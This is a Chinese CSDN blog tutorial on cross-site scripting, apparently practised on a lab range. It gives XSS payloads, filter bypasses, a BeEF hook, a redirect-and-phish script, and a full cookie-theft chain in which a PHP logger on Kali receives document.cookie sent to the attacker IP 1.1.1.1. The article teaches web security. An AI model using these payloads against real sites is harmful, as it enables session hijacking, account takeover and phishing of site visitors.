xss跨站脚本攻击(cross site script),了解xss的危害,利用靶场让我们明白xss的危害之大

最新推荐文章于 2024-04-14 22:38:53 发布
最新推荐文章于 2024-04-14 22:38:53 发布
阅读量800 收藏 4
点赞数
文章标签: xss 注入 基础 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XY011009/article/details/103447881
版权

xss介绍

xss跨脚本攻击,跨站脚本(cross site script),为了避免与样式css混淆,简称xss,xss是一种经常出现在web应用中的计算机安全漏洞,也是web中最常见的攻击方式。
什么是xss呢?xss是指恶意攻击者利用网站没有对用户提交数据进行转义处理,或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。和CSRF一样,都是用来对客户端进行攻击的。

xss攻击危害

1、盗取各类用户账号,如机器登录站好,用户网银账号,各类管理员账号
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
3、盗窃企业重要的具有商用价值的资料
4、非法转账
5、强制发送电子邮件
6、网站挂马
7、控制受害者及其向其他网站发起攻击

常见xss类型

常见的几种xss类型:反射型,存储型,DOM型

反射型(reflected)

利用类似检索框存在的xss漏洞,却不能存储xss脚本,只能有道用户去点自己插入了xss脚本的链接,然后进行操作,类似我们的钓鱼网站。
在这里插入图片描述

存储型(stored)

利用类似于留言板的地方,可以把你输入的语句保存起来的网站,如果这种网站存在xss漏洞,能够进行跨站脚本攻击,把脚本存储进服务器的网站后台,用户进入这个网站就会触发这个脚本,这个脚本如果是写成把本机cookie发送给攻击者,攻击者拿到cookie,利用cookie登录账号进行对账号的操作
在这里插入图片描述
上面是一个存储型的xss,已经注入了一个脚本进去,只要别人进入这个页面他就会执行这个脚本。
在这里插入图片描述

.
.

脚本的构建

构建xss脚本,会用到html,js

常用函数
在这里插入图片描述

弹窗警告

<script>alert(‘xss’)</script>

这个脚本实现弹窗提示,一般作为漏洞测试或者演示使用,这个js脚本实现弹窗提示,一般作为漏洞测试或者演示使用,一旦此脚本能执行,也就意味着后台服务器没有对特殊字符做过滤<>/’,证明这个页面存在xss漏洞

<script>alert(document.cookie)</script>
弹窗内容为自己的cookie

<iframe src=http://www.baidu.com width=300 height=300></iframe>
页面嵌套

<script>window.location=”http.baidu.com”</script>
页面重定向

接下来演示一下xss的应用

弹窗警告并重定向
<script>alert("这个页面已失效,请移步到我们的新站");location.href="http://www.baidu.com"</script>
这里就是结合了一些社工思路,通过网站内部私信的方式发给其他用户。
如果其他用户点击并且相信了这个信息,则可能再另外的站点重新登录账户(克隆网站收集账户)

访问恶意代码
<script src='http://www.baidu.com/xss.js'></script>
结合BeEF收集用户的cookie

巧用图片标签
<img src="www.baidu.com" onerror=alert("xss")>
<img src="javascript:alert('xss');">
<img src="http://BeFF_IP:3000/hook.js"><img>

网站存在过滤需要随机应变来编写能够绕开过滤的脚本

绕过大小写<ScrIpt>alert('xss')<SCRipt>
字符编码可以采用URL,Base64等编码

在这里插入图片描述
在这里插入图片描述
在存储型的xss注入中,注入成功后这个脚本将会保存到网站后台中,每当有用户成功访问这个网页,都会自动执行这个脚本,留言板就是一个典型的存储型,在这里输入成功的语句都会被保存在后台数据库中
在这里插入图片描述
这就是一个留言板注入进的xss脚本,一个js的弹窗警告,注入成功后被系统认为是代码,执行了这个代码使得页面进行弹窗
在这里插入图片描述
攻击运用 :获取cookie;渗透机kali linux端操作
1.构建收集cookie服务器
2.构造xss代码并植入到web服务器
3.等待肉鸡触发xss代码并将cookie发送到kali
4.cookie利用

接下来利用xss来进行一次实操,利用到PHP脚本,BeEF工具(这个更方便)

1构建收集cookie服务器
这里我们用kali作为这个服务器
2构建收集xss代码并植入到web服务器

root@kali:~# vim /var/www/html/cookie_rec.php
<?php
	$cookie = $_GET['cookie'];
	$log = fopen("cookie.txt","a");
	fwrite($log, $cookie . "\n")
	fclose($log);
	?>
这是一个简单的收集cookie的php脚本

在这里插入图片描述
赋予这个目录权限
通过渗透机植入xss代码:

<script>window.open('http://1.1.1.1/cookie_rec.php?cookie='+document.cookie)</script>
1.1.1.1是kali机的ip,也是/var/www/html这个目录

在这里插入图片描述
3.等待肉鸡触发xss代码并将cookie发送到kali
注入成功就等待目标进入这个网页触发这个脚本,然后他的cookie就被保存到了/var/www/目录下面的cookie.txt文本中
4.cookie利用
cookie拿下后可以进行别的一些操作,可以利用到BeEF来控制目标浏览器

这里附上一篇使用BeEF的文章,也是我的嘿嘿
BeEF工具介绍

XY011009
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS Script
weixin_30633507的博客
01-06 337
1) <iframe %00 src=”&Tab;javascript:prompt(1)&Tab;”%00> 2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>’ 3) <input/onmouseover=”javaSCRIPT&...
XSS-----跨站脚本攻击漏洞的概念和危害
热门推荐
Z_Grant的博客
08-25 1万+
感谢邱永华先生写出这么好的关于XSS的书!! 《XSS跨站脚本攻击剖析与防御》 文章目录一,基础概念(1)概念(2)危害(3)分类3.1 反射型脚本3.2 存储型脚本(4)发掘二,XSS-filter绕过(1) 什么时XSS-filter 一,基础概念 (1)概念 跨站脚本攻击(Cross Site Script脚本 ( Cross-Site Scriptin ) 是由于Web...
防御XSS的七条原则
收集盒 Book box
09-06 996
前言 author: shineforyou 本文将会着重介绍防御XSS攻击的一些原则,需要读者对于XSS有所了解,至少知道XSS漏洞的基本原理,如果您对此不是特别清楚,请参考这两篇文章:《Stored and Reflected XSS Attack》《DOM Based XSS》 攻击者可以利用XSS漏洞向用户发送攻击脚本,而用户的浏览器因为没有办法知道这段脚本是不可信的,所以依
xss攻击原理与解决方法
最新发布
套路猿的博客
04-14 7万+
概述XSS攻击是Web攻击最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
【干货】XSS知识总结
hackzkaq的博客
10-27 6624
XSS基础 脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
xss(攻击)
m0_74456293的博客
03-20 2431
xss攻击)
全网最详细 XSS 跨站脚本攻击,不是过来打死我!!
liuhyusb的博客
11-10 2639
Tom 发现 Bob 的点存在反射性的 XSS 漏洞 Tom 利用 Bob 网的反射型 XSS 漏洞编写了一个 exp,做成链接的形式,并利用各种手段诱使 Alice 点击 Alice 在登录到 Bob 的点后,浏览了 Tom 提供的恶意链接嵌入到恶意链接的恶意脚本在 Alice 的浏览器执行。当用户登录了存在漏洞的网,并且用户点击了我们构造的恶意链接时,该恶意链接的页面加载完后会执行 js 代码,完成表单的提交,表单的用户名参数是我们的恶意 js 代码。XSS 攻击针对的是用户层面的攻击!
XSS脚本攻击)
m0_52244931的博客
10-23 3846
XSS脚本go攻击
XSS跨站脚本攻击(基础详解)
cike_y
01-10 2278
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
跨站脚本攻击XSS(Cross Site Script)的原理与常见场景分析
10-18
XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的...这篇文章主要给大家介绍了关于跨站脚本攻击XSS(Cross Site Script)的原理与常见场景的相关资料,需要的朋友可以参考下。
PHP、Apache环境部署xsslabs(XSS跨站脚本攻击靶场
01-08
PHP、Apache环境部署xsslabs(XSS跨站脚本攻击靶场
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击-运维安全详细笔记
XSS跨站脚本攻击
01-27
脚本(crosssitescript)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用的计算机安全漏洞,也是web最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用没有对用户提交数据...
XSS脚本)概述
大雾
05-15 925
特殊字符+唯一识别字符 '"这是特殊字符6666这是唯一识别字符查看页面源代码ctf+f查询666F12选取页面元素,把长度限度改成200发现弹框成功 (反射型是不存储的刷新页面代码就没了。
转:XSSscript标签与img标签
ahltg62444的专栏
07-31 625
我们知道XSS漏洞最常见的检测方式就是输入<script>alert(‘xss’)</script>来确认,大部分人在测试的时候就是直接使用类似<script>alert(‘xss’)</script>这样的输入,如果发现有弹出对话框就说明存在漏洞,如果没有对话框就认为不存在漏洞。那么,只使用<script>标签是否就足够了呢?...
XSS脚本
ssslq的博客
03-03 748
基础概览
跨站脚本攻击XSS(Cross Site Scripting)总结
野原新之助
01-31 986
XSS是指开发者在开发网页时,对用户的输入没有进行安全过滤,导致用户在可以输入内容的地方,插入脚本语句,执行恶意脚本代码,可以对数据库、服务器、用户等造成影响危害,危险等级很高,也很常见。
xss绕过及防护
xiaoheizi的博客
06-29 485
CSP 的实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单。它是后端服务器对cookie设置的一个附加的属性,如果在生成cookie时使用HttpOnly,那么通过js脚本将无法读取到cookie信息,这样能有效的防止xss攻击。页面显示被过滤了尖括号,但是url没有被过滤,闭合input标签输入:">alert("xss")即可弹窗。在网代码文件配置:只会在当前代码文件生效,攻击者无法在该代码文件获取 cookie。
前端网络安全(一):XSS
qq_53058639的博客
02-08 936
原本的简称应该是CSS,但是为了和层叠样式表CSS区分,故而改称为XSSXSS攻击一般是指黑客通过 HTML注入篡改了页面,插入恶意的脚本,从而在用户浏览网页的时候,控制用户浏览器的一种攻击。针对各种不同场景产生的各种XSS,我们则需要区分情景对待。
XSS跨站脚本攻击危害、攻击原理、常用工具、防御策略
04-03
XSS(Cross-site scripting)跨站脚本攻击是一种常见的Web安全漏洞,它允许攻击者在受害者的浏览器注入恶意脚本,从而窃取用户的敏感信息,或者执行其他的恶意行为。 危害: 1. 盗取用户的Cookie和Session等敏感信息,以便进行身份欺骗。 2. 窃取用户的个人信息,如用户名和密码等。 3. 在受害者的浏览器执行恶意脚本,从而攻击其他网或者发起DDoS攻击。 4. 篡改网的内容,使用户产生误解或者损失。 攻击原理: 攻击者通过注入恶意脚本利用的漏洞,从而在受害者的浏览器执行恶意脚本。攻击者可以通过以下方式进行攻击: 1. 通过URL注入:攻击者在URL注入恶意脚本,当用户访问该URL时,脚本就会在用户的浏览器执行。 2. 通过表单注入:攻击者在表单注入恶意脚本,当用户提交表单时,脚本就会在用户的浏览器执行。 3. 通过Cookie注入:攻击者在Cookie注入恶意脚本,当用户访问网时,脚本就会在用户的浏览器执行。 4. 通过DOM注入:攻击者在网页的DOM节点注入恶意脚本,当用户浏览网页时,脚本就会在用户的浏览器执行。 常用工具: 1. XSSer:一款功能强大的XSS渗透测试工具,可以自动化执行XSS攻击。 2. BeEF:一款浏览器漏洞框架,可以将浏览器作为攻击的一部分,实现XSS攻击和其他浏览器相关的攻击。 3. XSStrike:一款自动化的XSS测试工具,可以识别漏洞并生成有效的攻击载荷。 防御策略: 1. 输入过滤:对用户输入的数据进行过滤,使其不包含特殊字符和脚本代码。 2. 输出转义:对输出到页面的内容进行转义,将特殊字符转换为HTML实体,从而防止恶意脚本注入。 3. 使用CSP:通过限制网可以加载的资源,如脚本、样式表和图片等,来防止XSS攻击。 4. 使用HTTP-only Cookie:将Cookie标记为HTTP-only,使其只能通过HTTP协议传输,从而防止通过JavaScript访问Cookie。 5. 随机化Cookie:在Cookie添加一些随机的信息,使攻击者无法猜测和伪造Cookie。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值